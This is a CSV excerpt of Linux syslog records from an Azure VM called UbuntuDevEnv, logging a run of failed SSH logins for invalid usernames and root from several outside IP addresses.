+11286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:47,UbuntuDevEnv,2019-06-26 00:19:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:47,UbuntuDevEnv,2019-06-26 00:19:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:50,UbuntuDevEnv,2019-06-26 00:19:49,auth,UbuntuDevEnv,info,Failed password for invalid user rabbitmq from 131.100.219.3 port 44958 ssh2,71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,131.100.219.3,44958,,
+11289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:50,UbuntuDevEnv,2019-06-26 00:19:49,auth,UbuntuDevEnv,info,Disconnected from invalid user rabbitmq 131.100.219.3 port 44958 [preauth],71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,131.100.219.3,44958,,
+11290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:19:50,UbuntuDevEnv,2019-06-26 00:19:49,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 44958:11: Bye Bye [preauth],71183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,44958,,
+11291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:00,UbuntuDevEnv,2019-06-26 00:20:00,auth,UbuntuDevEnv,info,Invalid user jenkins from 104.248.121.67 port 60920,71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,104.248.121.6,60920,,
+11292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:00,UbuntuDevEnv,2019-06-26 00:20:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:00,UbuntuDevEnv,2019-06-26 00:20:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:02,UbuntuDevEnv,2019-06-26 00:20:02,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 104.248.121.67 port 60920 ssh2,71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,104.248.121.6,60920,,
+11295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:02,UbuntuDevEnv,2019-06-26 00:20:02,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 104.248.121.67 port 60920 [preauth],71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,104.248.121.6,60920,,
+11296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:02,UbuntuDevEnv,2019-06-26 00:20:02,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 60920:11: Bye Bye [preauth],71234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,60920,,
+11297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:24,UbuntuDevEnv,2019-06-26 00:20:23,auth,UbuntuDevEnv,info,Invalid user bugtracer from 88.247.110.88 port 41647,71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bugtracer,88.247.110.8,41647,,
+11298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:24,UbuntuDevEnv,2019-06-26 00:20:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:24,UbuntuDevEnv,2019-06-26 00:20:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:25,UbuntuDevEnv,2019-06-26 00:20:25,auth,UbuntuDevEnv,info,Failed password for invalid user bugtracer from 88.247.110.88 port 41647 ssh2,71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bugtracer,88.247.110.8,41647,,
+11301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:26,UbuntuDevEnv,2019-06-26 00:20:25,auth,UbuntuDevEnv,info,Disconnected from invalid user bugtracer 88.247.110.88 port 41647 [preauth],71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bugtracer,88.247.110.8,41647,,
+11302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:26,UbuntuDevEnv,2019-06-26 00:20:25,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 41647:11: Bye Bye [preauth],71328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,41647,,
+11303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:27,auth,UbuntuDevEnv,info,Invalid user courier from 114.112.81.180 port 52222,71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,114.112.81.1,52222,,
+11304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:28,auth,UbuntuDevEnv,info,Invalid user zg from 186.31.116.78 port 47501,71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,186.31.116.7,47501,,
+11308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:28,UbuntuDevEnv,2019-06-26 00:20:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:30,UbuntuDevEnv,2019-06-26 00:20:29,auth,UbuntuDevEnv,info,Failed password for invalid user courier from 114.112.81.180 port 52222 ssh2,71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,114.112.81.1,52222,,
+11310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:30,UbuntuDevEnv,2019-06-26 00:20:30,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 52222:11: Bye Bye [preauth],71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,52222,,
+11311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:30,UbuntuDevEnv,2019-06-26 00:20:30,auth,UbuntuDevEnv,info,Disconnected from invalid user courier 114.112.81.180 port 52222 [preauth],71336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,114.112.81.1,52222,,
+11312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:30,UbuntuDevEnv,2019-06-26 00:20:30,auth,UbuntuDevEnv,info,Failed password for invalid user zg from 186.31.116.78 port 47501 ssh2,71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,186.31.116.7,47501,,
+11313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:31,UbuntuDevEnv,2019-06-26 00:20:30,auth,UbuntuDevEnv,info,Disconnected from invalid user zg 186.31.116.78 port 47501 [preauth],71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,186.31.116.7,47501,,
+11314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:31,UbuntuDevEnv,2019-06-26 00:20:30,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 47501:11: Bye Bye [preauth],71340,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,47501,,
+11315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:49,UbuntuDevEnv,2019-06-26 00:20:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:49,UbuntuDevEnv,2019-06-26 00:20:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:49,UbuntuDevEnv,2019-06-26 00:20:48,auth,UbuntuDevEnv,info,Invalid user soap from 118.222.146.186 port 38666,71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,118.222.146.1,38666,,
+11318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:51,UbuntuDevEnv,2019-06-26 00:20:50,auth,UbuntuDevEnv,info,Failed password for invalid user soap from 118.222.146.186 port 38666 ssh2,71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,118.222.146.1,38666,,
+11319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:51,UbuntuDevEnv,2019-06-26 00:20:51,auth,UbuntuDevEnv,info,Disconnected from invalid user soap 118.222.146.186 port 38666 [preauth],71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soap,118.222.146.1,38666,,
+11320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:20:51,UbuntuDevEnv,2019-06-26 00:20:51,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 38666:11: Bye Bye [preauth],71411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,38666,,
+11321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:21:30,UbuntuDevEnv,2019-06-26 00:21:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67  user=root,71566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,104.248.121.6,,0,
+11322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:21:32,UbuntuDevEnv,2019-06-26 00:21:31,auth,UbuntuDevEnv,info,Failed password for root from 104.248.121.67 port 41127 ssh2,71566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,41127,,
+11323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:21:32,UbuntuDevEnv,2019-06-26 00:21:31,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 41127:11: Bye Bye [preauth],71566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,41127,,
+11324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:21:32,UbuntuDevEnv,2019-06-26 00:21:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 104.248.121.67 port 41127 [preauth],71566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,104.248.121.6,41127,,
+11325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:04,UbuntuDevEnv,2019-06-26 00:22:04,auth,UbuntuDevEnv,info,Invalid user connor from 131.100.219.3 port 33126,71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,131.100.219.3,33126,,
+11326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:04,UbuntuDevEnv,2019-06-26 00:22:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:04,UbuntuDevEnv,2019-06-26 00:22:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:06,UbuntuDevEnv,2019-06-26 00:22:06,auth,UbuntuDevEnv,info,Failed password for invalid user connor from 131.100.219.3 port 33126 ssh2,71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,131.100.219.3,33126,,
+11329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:07,UbuntuDevEnv,2019-06-26 00:22:06,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 33126:11: Bye Bye [preauth],71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,33126,,
+11330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:07,UbuntuDevEnv,2019-06-26 00:22:06,auth,UbuntuDevEnv,info,Disconnected from invalid user connor 131.100.219.3 port 33126 [preauth],71679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,131.100.219.3,33126,,
+11331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:07,UbuntuDevEnv,2019-06-26 00:22:07,auth,UbuntuDevEnv,info,Invalid user h1rnt0t from 88.247.110.88 port 51742,71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,88.247.110.8,51742,,
+11332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:07,UbuntuDevEnv,2019-06-26 00:22:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:07,UbuntuDevEnv,2019-06-26 00:22:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:09,UbuntuDevEnv,2019-06-26 00:22:09,auth,UbuntuDevEnv,info,Failed password for invalid user h1rnt0t from 88.247.110.88 port 51742 ssh2,71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,88.247.110.8,51742,,
+11335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:09,UbuntuDevEnv,2019-06-26 00:22:09,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 51742:11: Bye Bye [preauth],71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,51742,,
+11336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:09,UbuntuDevEnv,2019-06-26 00:22:09,auth,UbuntuDevEnv,info,Disconnected from invalid user h1rnt0t 88.247.110.88 port 51742 [preauth],71699,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,h1rnt0t,88.247.110.8,51742,,
+11337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:15,UbuntuDevEnv,2019-06-26 00:22:15,auth,UbuntuDevEnv,info,Invalid user ubuntu from 114.112.81.180 port 43050,71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,43050,,
+11338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:15,UbuntuDevEnv,2019-06-26 00:22:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:15,UbuntuDevEnv,2019-06-26 00:22:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:18,UbuntuDevEnv,2019-06-26 00:22:17,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 114.112.81.180 port 43050 ssh2,71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,43050,,
+11341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:18,UbuntuDevEnv,2019-06-26 00:22:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 114.112.81.180 port 43050 [preauth],71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,43050,,
+11342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:18,UbuntuDevEnv,2019-06-26 00:22:17,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 43050:11: Bye Bye [preauth],71726,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,43050,,
+11343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:27,UbuntuDevEnv,2019-06-26 00:22:27,auth,UbuntuDevEnv,info,Invalid user nicholas from 186.31.116.78 port 56301,71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nicholas,186.31.116.7,56301,,
+11344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:27,UbuntuDevEnv,2019-06-26 00:22:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:22:27,UbuntuDevEnv,2019-06-26 00:22:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
